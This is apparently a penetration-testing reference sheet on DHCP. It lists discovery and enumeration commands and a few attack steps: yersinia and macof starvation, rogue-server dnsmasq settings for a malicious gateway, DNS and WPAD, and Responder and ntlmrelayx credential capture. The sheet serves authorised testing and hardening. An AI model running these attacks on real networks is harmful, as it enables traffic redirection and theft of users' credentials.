DHCP (Dynamic Host Configuration Protocol)
Default Ports: 67/UDP (Server), 68/UDP (Client)
DHCP assigns IP addresses, gateways, DNS servers, domain names, and other network options to clients. In internal pentests, DHCP testing can expose rogue servers, weak network controls, WPAD redirection risk, and useful network configuration.
Connect
Using dhclient
dhclient shows the configuration a normal client receives.
sudo dhclient -v eth0
sudo dhclient -r eth0
sudo dhclient -v -I test-client-01 eth0
Using NetworkManager
NetworkManager shows DHCP values applied to the host.
nmcli connection show --active
nmcli connection down "Wired connection 1"
nmcli connection up "Wired connection 1"
nmcli device show eth0
Packet Capture
Packet capture is the safest way to observe DHCP offers.
sudo tcpdump -ni eth0 'udp and (port 67 or port 68)'
sudo tcpdump -ni eth0 -w dhcp.pcap 'udp and (port 67 or port 68)'
Recon
DHCP Discovery
Broadcast discovery identifies DHCP servers on the local VLAN.
sudo nmap --script broadcast-dhcp-discover -e eth0
sudo nmap --script broadcast-dhcp-discover --packet-trace -e eth0
Identify DHCP Servers
Look for unexpected server identifiers or multiple offers.
sudo tcpdump -ni eth0 -vvv 'udp and (port 67 or port 68)'
# Interesting options:
# 53 DHCP Message Type
# 54 Server Identifier
# 3 Router
# 6 DNS Server
# 15 Domain Name
# 252 WPAD
Lease Review
Lease files reveal accepted DHCP options.
cat /var/lib/dhcp/dhclient.leases
grep -Ei 'routers|domain-name|domain-name-servers|ntp|wpad' /var/lib/dhcp/dhclient.leases
Enumeration
DHCP Options
Enumerate assigned network options for DNS, gateway, domain, NTP, PXE, and WPAD.
sudo nmap --script broadcast-dhcp-discover -e eth0
nmcli device show eth0 | grep -Ei 'IP4.DNS|IP4.GATEWAY|DOMAIN|DHCP'
WPAD Enumeration
DHCP option 252 may point clients to proxy auto-config files.
sudo tcpdump -ni eth0 -vvv 'udp and (port 67 or port 68)' | grep -i wpad
curl -I http://wpad/wpad.dat
PXE Enumeration
PXE options may reveal boot servers and deployment infrastructure.
sudo tcpdump -ni eth0 -vvv 'udp and (port 67 or port 68)' | grep -Ei 'tftp|boot|pxe|next-server'
Attack Vectors
Rogue DHCP Server
A rogue server can provide malicious gateway, DNS, or WPAD settings.
sudo yersinia -G
sudo bettercap -iface eth0
DHCP Starvation
Starvation exhausts the address pool and can force clients toward rogue services.
sudo yersinia dhcp -attack 1
sudo macof -i eth0
Malicious DNS or Gateway
Changing DNS or router options can redirect client traffic.
# Example dnsmasq test configuration
interface=eth0
dhcp-range=192.168.56.100,192.168.56.200,12h
dhcp-option=3,192.168.56.1
dhcp-option=6,192.168.56.1
WPAD Redirection
WPAD can redirect HTTP proxy discovery to attacker-controlled infrastructure.
# dnsmasq DHCP option 252
dhcp-option=252,http://192.168.56.1/wpad.dat
Post-Exploitation
Network Mapping
DHCP options help map network infrastructure.
grep -Ei 'routers|domain-name|domain-name-servers|ntp|wpad|next-server' /var/lib/dhcp/dhclient.leases
Credential Capture Review
WPAD and DNS redirection tests may trigger proxy authentication attempts.
sudo responder -I eth0 -w -F
sudo ntlmrelayx.py -tf targets.txt -smb2support
Useful Tools
| Tool | Purpose |
|---|---|
tcpdump | DHCP packet capture |
nmap | Broadcast DHCP discovery |
dhclient | Client lease testing |
nmcli | Applied DHCP settings |
yersinia | DHCP attack testing |
dnsmasq | Controlled rogue DHCP lab testing |
Responder | WPAD credential capture testing |
Security Misconfigurations
| Misconfiguration | Risk |
|---|---|
| No DHCP snooping | Rogue DHCP attacks |
| Multiple unexpected DHCP servers | Client redirection |
| WPAD option enabled broadly | Proxy credential capture |
| Untrusted DNS via DHCP | Traffic redirection |
| PXE options exposed | Deployment infrastructure leakage |
| No port security | DHCP starvation risk |